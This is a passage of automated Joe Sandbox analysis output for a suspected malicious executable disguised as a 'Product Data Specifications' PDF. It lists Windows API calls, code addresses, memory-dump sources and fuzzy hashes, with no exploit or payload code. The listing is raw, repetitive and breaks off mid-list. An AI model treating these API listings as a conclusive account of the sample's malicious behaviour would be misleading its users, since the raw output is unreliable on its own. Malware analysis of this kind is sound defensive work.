                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                              • String ID: crts
                              • API String ID: 943502515-3724388283
                              • Opcode ID: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                              • Opcode Fuzzy Hash: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$LabelVolume
                              • String ID: \VH
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetMenuItemInfoW.USER32 ref: 00449727
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                              • DrawMenuBar.USER32 ref: 00449761
                              Strings
                              Similarity
                              • API ID: Menu$InfoItem$Draw_malloc
                              • String ID: 0
                              APIs
                              Strings
                              Similarity
                              • API ID: _wcslen$_wcscpy
                              • String ID: 3, 3, 8, 1
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                              Strings
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCloseHandle
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                              Strings
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCreateFile
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                              Strings
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpSendEcho
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                              Strings
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              APIs
                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                              • __itow.LIBCMT ref: 004699CD
                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                              • __itow.LIBCMT ref: 00469A97
                              Similarity
                              • API ID: MessageSend$__itow
                              • String ID:
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                              • ScreenToClient.USER32(?,?), ref: 00449A80
                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              APIs
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              APIs
                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                              • GetWindowRect.USER32(?,?), ref: 00441722
                              • PtInRect.USER32(?,?,?), ref: 00441734
                              • MessageBeep.USER32(00000000), ref: 004417AD
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              APIs
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                              • __isleadbyte_l.LIBCMT ref: 004208A6
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              APIs
                              • GetParent.USER32(?), ref: 004503C8
                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                              Similarity
                              • API ID: Proc$Parent
                              • String ID:
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                              • TranslateMessage.USER32(?), ref: 00442B01
                              • DispatchMessageW.USER32(?), ref: 00442B0B
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Similarity
                              • API ID: Message$Peek$DispatchTranslate
                              • String ID:
                              • API String ID: 1795658109-0
                              APIs
                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • GetCaretPos.USER32(?), ref: 004743B2
                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                              • GetForegroundWindow.USER32 ref: 004743EE
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              APIs
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                              • _wcslen.LIBCMT ref: 00449519
                              • _wcslen.LIBCMT ref: 00449526
                              Similarity
                              • API ID: MessageSend_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 2886238975-0
                              APIs
                              Similarity
                              • API ID: __setmode$DebugOutputString_fprintf
                              • String ID:
                              • API String ID: 1792727568-0
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                              Similarity
                              • API ID: Window$Long$AttributesLayered
                              • String ID:
                              • API String ID: 2169480361-0
                              APIs
                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                              Strings
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                              • String ID: cdecl
                              • API String ID: 3850814276-3896280584
                              APIs
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                              • _memmove.LIBCMT ref: 0046D475
                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 2502553879-0
                              APIs
                              • SendMessageW.USER32 ref: 00448C69
                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                              Similarity
                              • API ID: ErrorLastacceptselect
                              • String ID:
                              • API String ID: 385091864-0
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                              • GetStockObject.GDI32(00000011), ref: 00430258
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                              Similarity
                              • API ID: Window$CreateMessageObjectSendShowStock
                              • String ID:
                              • API String ID: 1358664141-0
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2880819207-0
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              APIs
                              • __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • __wsplitpath.LIBCMT ref: 00433950
                              • __wcsicoll.LIBCMT ref: 00433974
                              • __wcsicoll.LIBCMT ref: 0043398A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                              • String ID:
                              • API String ID: 1187119602-0
                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                              • String ID:
                              • API String ID: 1597257046-0
                              • Opcode ID: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                              • Opcode Fuzzy Hash: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                              APIs
                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                              • __malloc_crt.LIBCMT ref: 0041F5B6
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$Free__malloc_crt
                              • String ID:
                              • API String ID: 237123855-0
                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconWindow
                              • String ID:
                              • API String ID: 3349847261-0
                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
